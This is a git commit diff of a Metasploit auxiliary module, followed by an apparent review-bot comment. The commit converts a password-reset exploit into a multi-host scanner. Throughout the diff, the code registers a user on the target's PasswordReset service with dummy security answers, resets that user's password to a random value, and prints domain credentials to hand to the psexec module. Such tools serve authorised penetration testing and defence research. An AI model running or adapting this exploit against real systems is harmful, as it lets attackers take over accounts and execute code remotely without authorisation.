Mixin Scanner. Yay speed!

bug/bundler_fix
Jon Hart 2014-12-11 14:44:48 -08:00
parent c9acd7a233
commit 0a29326ce7
1 changed files with 21 additions and 14 deletions


@ -9,6 +9,7 @@ class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -38,26 +39,31 @@ class Metasploit4 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def localuser
res = send_request_cgi({ datastore['LOCALUSER']
end
def run_host(ip)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'PasswordReset'), 'uri' => normalize_uri(target_uri.path, 'PasswordReset'),
}) )
unless res unless res
fail_with(Failure::Unknown, "Could not contact server") print_error("#{peer}: Could not contact server")
return
end end
cookies = res.get_cookies cookies = res.get_cookies
domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/ domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/
domain = datastore['DOMAIN'] if datastore['DOMAIN'] != '' domain = datastore['DOMAIN'] if datastore['DOMAIN'] != ''
res = send_request_cgi({ res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'), 'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'vars_post' => { 'vars_post' => {
'domainname' => domain, 'domainname' => domain,
'userName' => datastore['LOCALUSER'], 'userName' => localuser,
'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com', 'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]', 'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
'updatequesChk' => 'false', 'updatequesChk' => 'false',
@ -68,10 +74,11 @@ class Metasploit4 < Msf::Auxiliary
'confirmanswer' => 'not', 'confirmanswer' => 'not',
'confirmanswer' => 'not' 'confirmanswer' => 'not'
} }
}) )
if !res or res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}" if !res || res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
fail_with(Failure::Unknown, "Could not register the user.") print_error("#{peer}: Could not register the #{localuser} user")
return
end end
password = Rex::Text.rand_text_alpha(10) + "!1" password = Rex::Text.rand_text_alpha(10) + "!1"
@ -83,16 +90,16 @@ class Metasploit4 < Msf::Auxiliary
'vars_post' => { 'vars_post' => {
'newPassword' => password, 'newPassword' => password,
'domain' => domain, 'domain' => domain,
'UserName' => datastore['LOCALUSER'], 'UserName' => localuser,
'CkbResetpassword' => 'true' 'CkbResetpassword' => 'true'
} }
}) })
if !res or res.body != '{"success":true,"data":{"PasswordResetStatus":0}}' if !res || res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
fail_with(Failure::Unknown, "Could not change the user's password. Is it a domain or local user?") print_error("#{peer}: Could not change #{localuser}'s password -- is it a domain or local user?")
return
end end
print_status("Please run the psexec module using:") print_good("#{peer} Please run the psexec module using #{domain}\\#{localuser}:#{password}")
print_status("#{domain}\\#{datastore['LOCALUSER']}:#{password}")
end end
end end
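Review bot: In run_host, `domain` stays nil when the first response does not match the `"domainName"` pattern and DOMAIN is empty, yet the code goes on to the Register POST and, if the later checks happen to pass, prints a `#{domain}\\#{localuser}` string with nothing before the backslash. Now that the module runs per host under the Scanner mixin, such a host should be skipped like the other failure paths, e.g. `return print_error("#{peer}: Could not determine the domain name") if domain.to_s.empty?` right after the DOMAIN override. If the DOMAIN option (registered outside the visible hunks) can be nil rather than '', the `!= ''` test would also replace a parsed domain with nil, so `unless datastore['DOMAIN'].to_s.empty?` is the safer condition there. A smaller style point: the third `send_request_cgi` call still closes with `})` while the other two were converted to the brace-less form. The body of run_host spans several hunks and parts of it are not visible here.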